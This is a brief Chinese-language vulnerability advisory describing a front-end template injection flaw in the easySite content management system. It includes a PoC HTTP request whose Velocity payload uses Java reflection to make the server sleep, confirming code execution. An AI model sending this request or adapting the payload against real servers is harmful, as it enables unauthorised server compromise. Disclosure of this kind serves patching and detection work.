漏洞描述
easySite内容管理系统是中科汇联公司开发完成的智能化、组件化、个性化、流程化、标准化和国际化的专业内容管理系统。该系统存在前台模板注入漏洞,攻击者可以根据该漏洞获取服务器权限。
easySite内容管理系统前台模板注入漏洞
PoC代码
POST /search/userbehavior/replication HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
pageId=f5261418ddc74f03b27e3590c531102b&q=hello&wt=velocity&v.template=custom&v.template.custom=%23set($x%3d'')+$x.class.forName('java.lang.Thread').sleep(2000)